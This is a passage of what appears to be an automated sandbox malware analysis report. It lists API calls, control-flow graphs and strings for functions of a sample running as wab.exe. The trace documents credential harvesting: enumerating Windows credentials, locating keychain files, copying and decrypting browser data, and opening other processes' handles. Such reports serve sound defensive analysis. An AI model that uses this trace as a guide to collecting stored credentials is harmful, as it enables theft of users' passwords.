                      • memset.MSVCRT ref: 0040DDAD
                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                      • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                      • _wcsicmp.MSVCRT ref: 0040DEB2
                      • _wcsicmp.MSVCRT ref: 0040DEC5
                      • _wcsicmp.MSVCRT ref: 0040DED8
                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                      • memset.MSVCRT ref: 0040DF5F
                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                      • _wcsicmp.MSVCRT ref: 0040DFB2
                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                      • API String ID: 594330280-3398334509
                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                      Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 ??3@YAXPAX@Z 643->646 648 413edb-413ee2 645->648 646->648 656 413ee4 648->656 657 413ee7-413efe 648->657 662 413ea2-413eae CloseHandle 650->662 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 654->650 658 413e6a-413e76 654->658 655->654 660 413e46-413e5c GetProcAddress 655->660 656->657 657->638 658->650 660->654 662->641
                      APIs
                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                      • memset.MSVCRT ref: 00413D7F
                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                      • memset.MSVCRT ref: 00413E07
                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                      • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                      • API String ID: 912665193-1740548384
                      • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                      • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                      Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                      • memcpy.MSVCRT ref: 0040B60D
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                      • String ID: BIN
                      • API String ID: 1668488027-1015027815
                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                      Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                        • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                      • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                      • String ID:
                      • API String ID: 2947809556-0
                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                      Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileFind$FirstNext
                      • String ID:
                      • API String ID: 1690352074-0
                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                      Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0041898C
                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: InfoSystemmemset
                      • String ID:
                      • API String ID: 3558857096-0
                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                      Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                      APIs
                      • memset.MSVCRT ref: 004455C2
                      • wcsrchr.MSVCRT ref: 004455DA
                      • memset.MSVCRT ref: 0044570D
                      • memset.MSVCRT ref: 00445725
                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                        • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                        • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                      • memset.MSVCRT ref: 0044573D
                      • memset.MSVCRT ref: 00445755
                      • memset.MSVCRT ref: 004458CB
                      • memset.MSVCRT ref: 004458E3
                      • memset.MSVCRT ref: 0044596E
                      • memset.MSVCRT ref: 00445A10
                      • memset.MSVCRT ref: 00445A28
                      • memset.MSVCRT ref: 00445AC6
                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                      • memset.MSVCRT ref: 00445B52
                      • memset.MSVCRT ref: 00445B6A
                      • memset.MSVCRT ref: 00445C9B
                      • memset.MSVCRT ref: 00445CB3
                      • _wcsicmp.MSVCRT ref: 00445D56
                      • memset.MSVCRT ref: 00445B82
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                      • memset.MSVCRT ref: 00445986
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                      • API String ID: 2745753283-3798722523
                      • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                      • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                      Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                      • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                      • String ID: $/deleteregkey$/savelangfile
                      • API String ID: 2744995895-28296030
                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                      Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 0040B71C
                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                      • wcsrchr.MSVCRT ref: 0040B738
                      • memset.MSVCRT ref: 0040B756
                      • memset.MSVCRT ref: 0040B7F5
                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                      • memset.MSVCRT ref: 0040B851
                      • memset.MSVCRT ref: 0040B8CA
                      • memcmp.MSVCRT ref: 0040B9BF
                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                      • memset.MSVCRT ref: 0040BB53
                      • memcpy.MSVCRT ref: 0040BB66
                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                      • String ID: chp$v10
                      • API String ID: 170802307-2783969131
                      • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                      • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                      Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 512 40e304-40e316 call 406e8f 510->512 516 40e476-40e483 call 406b53 512->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->512 524->509 530 40e497-40e49f ??3@YAXPAX@Z 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 555 40e3c3-40e3c6 550->555 551->552 553 40e416-40e427 memcpy 552->553 554 40e42a-40e42f 552->554 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                      APIs
                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                      • memset.MSVCRT ref: 0040E380
                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                      • wcschr.MSVCRT ref: 0040E3B8
                      • memcpy.MSVCRT ref: 0040E3EC
                      • memcpy.MSVCRT ref: 0040E407
                      • memcpy.MSVCRT ref: 0040E422
                      • memcpy.MSVCRT ref: 0040E43D
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                      • API String ID: 3073804840-2252543386
                      • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                      • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                      Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                      • String ID:
                      • API String ID: 3715365532-3916222277
                      • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                      • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
